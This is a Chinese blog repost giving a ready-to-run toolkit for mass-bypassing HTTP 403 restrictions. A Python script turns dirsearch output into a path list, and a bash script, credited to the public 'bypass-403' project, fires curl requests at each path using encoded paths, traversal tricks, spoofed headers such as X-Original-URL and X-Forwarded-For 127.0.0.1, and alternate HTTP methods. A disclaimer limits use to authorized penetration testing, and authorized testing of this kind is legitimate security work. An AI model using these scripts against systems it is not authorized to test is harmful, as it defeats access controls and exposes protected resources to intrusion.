解放双手,批量绕过403

2024-04-15 07:12
文章标签 批量 403 绕过 解放 双手

本文主要是介绍解放双手,批量绕过403,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

将dirsearch扫描出来的结果复制到url.txt,如下所示

url.txt

[21:18:16] 502 -    0B  - /var/log/exception.log
[21:18:21] 502 -    0B  - /WEB-INF/jetty-env.xml
[21:18:22] 502 -    0B  - /WEB-INF/weblogic.xml
[21:18:27] 502 -    0B  - /wp-json/wp/v2/users/
[21:18:27] 502 -    0B  - /wp-json/
[21:18:28] 502 -    0B  - /wuwu11.php
[21:18:29] 502 -    0B  - /wwwstats.htm
[21:18:29] 502 -    0B  - /xprober.php
[21:18:30] 502 -    0B  - /zehir.php

接下来利用python脚本对url.txt进行清洗

python q.py url.txt

q.py代码如下所示:

​import sys

# 读取文件并清洗路径
def clean_paths(file_path):
    cleaned_paths = []
    with open(file_path, 'r') as file:
        for line in file:
            # 提取路径部分
            path = line.split(' - ')[2].strip()
            # 二次清洗,去除路径两端的斜杠
            cleaned_path = path.strip('/')
            cleaned_paths.append(cleaned_path)
    return cleaned_paths

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python script.py <input_file>")
        sys.exit(1)

    input_file_path = sys.argv[1]
    output_file_path = 'path.txt'

    # 执行清洗路径函数
    cleaned_paths = clean_paths(input_file_path)

    # 将结果写入到path.txt文件中
    with open(output_file_path, 'w') as output_file:
        for path in cleaned_paths:
            output_file.write(path + '\n')

    print("清洗后的路径已写入到 path.txt 文件中。")

上面的脚本将清洗后的结果输出到path.txt

接着使用脚本bypass403.sh

bypass403.sh脚本内容如下:

#! /bin/bash
figlet Bypass-403
echo "By Iam_J0ker"
echo " "

# 检查是否提供了URL和路径文件
if [ -z "$1" ] || [ -z "$2" ]; then
    echo "使用方法: $0 <URL> <路径文件>"
    exit 1
fi

# 提取URL
url=$1
shift

# 检查路径文件是否存在且可读
if [ ! -f "$1" ]; then
    echo "未找到路径文件或不可读"
    exit 1
fi

# 显示URL
echo "URL: $url"

# 逐行读取路径文件中的路径
while IFS= read -r path; do
    # 显示路径
    echo "路径: $path"
    
    # 执行绕过技术
    echo " "
    echo "正在对 $url$path 执行绕过技术"
    echo " "

    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path"
    echo "  --> $url/$path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/%2e/$path"
    echo "  --> $url/%2e/$path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path/."
    echo "  --> $url/$path/."
    
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url//$path//"
    echo "  --> $url//$path//"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/./$path/./"
    echo "  --> $url/./$path/./"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Original-URL: $path" "$url/$path"
    echo "  --> $url/$path -H X-Original-URL: $path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Custom-IP-Authorization: 127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Custom-IP-Authorization: 127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: http://127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Forwarded-For: http://127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 127.0.0.1:80" "$url/$path"
    echo "  --> $url/$path -H X-Forwarded-For: 127.0.0.1:80"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-rewrite-url: $path" "$url"
    echo "  --> $url -H X-rewrite-url: $path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path%20"
    echo "  --> $url/$path%20"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path%09"
    echo "  --> $url/$path%09"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path?"
    echo "  --> $url/$path?"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path.html"
    echo "  --> $url/$path.html"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path/?anything"
    echo "  --> $url/$path/?anything"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path#"
    echo "  --> $url/$path#"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "Content-Length:0" -X POST "$url/$path"
    echo "  --> $url/$path -H Content-Length:0 -X POST"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path/*"
    echo "  --> $url/$path/*"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path.php"
    echo "  --> $url/$path.php"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path.json"
    echo "  --> $url/$path.json"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE "$url/$path"
    echo "  --> $url/$path -X TRACE"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Host: 127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Host: 127.0.0.1"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path..;/"
    echo "  --> $url/$path..;/"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path;/"
    echo "  --> $url/$path;/"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE "$url/$path"
    echo "  --> $url/$path -X TRACE"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-Host: 127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Forwarded-Host: 127.0.0.1"
    echo "Way back machine:"
    curl -s  https://archive.org/wayback/available?url=$url/$path | jq -r '.archived_snapshots.closest | {available, url}'
    echo " "
done < "$1"

将上面这些文件均放在同文件夹下

用命令启动:

./bypass403.sh url pass.txt

从而达到批量绕过403的目的。

参考链接:

https://github.com/iamj0ker/bypass-403?tab=readme-ov-file

​以上目的只为了方便日常渗透测试,侵权请联系删除!!!未授权切勿进行渗透!!!

这篇关于解放双手,批量绕过403的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/905172

相关文章

小技巧绕过Sina Visitor System(新浪访客系统)

0x00 前言 一直以来,爬虫与反爬虫技术都时刻进行着博弈,而新浪微博作为一个数据大户更是在反爬虫上不遗余力。常规手段如验证码、封IP等等相信很多人都见识过…… 当然确实有需要的话可以通过新浪开放平台提供的API进行数据采集,但是普通开发者的权限比较低,限制也比较多。所以如果只是做一些简单的功能还是爬虫比较方便~ 应该是今年的早些时候,新浪引入了一个Sina Visitor Syst

Python脚本:对文件进行批量重命名

字符替换:批量对文件名中指定字符进行替换添加前缀:批量向原文件名添加前缀添加后缀:批量向原文件名添加后缀 import osdef Rename_CharReplace():#对文件名中某字符进行替换(已完结)re_dir = os.getcwd()re_list = os.listdir(re_dir)original_char = input('请输入你要替换的字符:')replace_ch

Python脚本:批量解压RAR文件

所需模块: os.getcwd() #获取脚本文件路径os.system() #执行系统命令 import os#source_dir = input("Please input in source_dir:")#unzip_dir = input("Please input in unzip_dir:") source_dir = os.

vcpkg子包路径批量获取

获取vcpkg 子包的路径,并拼接为set(CMAKE_PREFIX_PATH “拼接路径” ) import osdef find_directories_with_subdirs(root_dir):# 构建根目录下的 "packages" 文件夹路径root_packages_dir = os.path.join(root_dir, "packages")# 如果 "packages"

Python批量读取身份证信息录入系统和重命名

前言 大家好, 如果你对自动化处理身份证图片感兴趣,可以尝试以下操作:从身份证图片中快速提取信息,填入表格并提交到网页系统。如果你无法完成这个任务,我们将在“Python自动化办公2.0”课程中详细讲解实现整个过程。 实现过程概述: 模块与功能: re 模块:用于从 OCR 识别出的文本中提取所需的信息。 日期模块:计算年龄。 pandas:处理和操作表格数据。 PaddleOCR:百度的

分享MSSQL、MySql、Oracle的大数据批量导入方法及编程手法细节

1:MSSQL SQL语法篇: BULK INSERT      [ database_name . [ schema_name ] . | schema_name . ] [ table_name | view_name ]         FROM 'data_file'        [ WITH       (      [ [ , ] BATCHSIZE = batch_siz

frida检测绕过-libmsaoaidsec.so

libmsaoaidsec.so 部分检测手段 检测机制在native层实现一般在init_proc()函数中触发使用 pthread_create 创建2个检测线程 绕过: nop pthread_create 的调用 eg: 在 bilibil1 - v7.26.1版本中, 在got表导入了pthread_create 绕过: 替换dlsym(xx, "pthread_create ")的返

C语言批量数据到动态二维数组

上一篇文章将文件读取放到静态创建的二维数组中,但是结合网络上感觉到今天的DT时代,这样批量大量读取一个上百行的数据,分配的内存是否可能因为大量的数据而产生溢出呢,最近一直研究里malloc函数,通过它来动态建立所需的二维数组,因此,通过文件操作和动态创建二维数组结合起来,将大量的数据动态的放入矩阵中,不知道这样的思想是否正确,下午把程序运行出来了,将程序贴上来,欢迎大家一起探讨:对于有规律的大数据

Mybatis Plus快速重构真批量sql入库操作

Mybatis快速重构真批量sql入库操作 基本思路 重构mybatis默认方法saveBatch和saveOrUpdateBatch的实现 基本步骤 真批量保存实现类InsertBatchMethod真批量更新实现类MysqlInsertOrUpdateBath注册InsertBatchMethod和MysqlInsertOrUpdateBath到EasySqlInjector注册Eas

批量生成编号(A~Z+3位流水编号)

/*** 批量生成编号* @param num* @param warehouseId* @return*/public synchronized List<String> generatCodeList(int num,long warehouseId){MesRack rack = this.getCurrentRack(warehouseId);String oldRackCode;Lis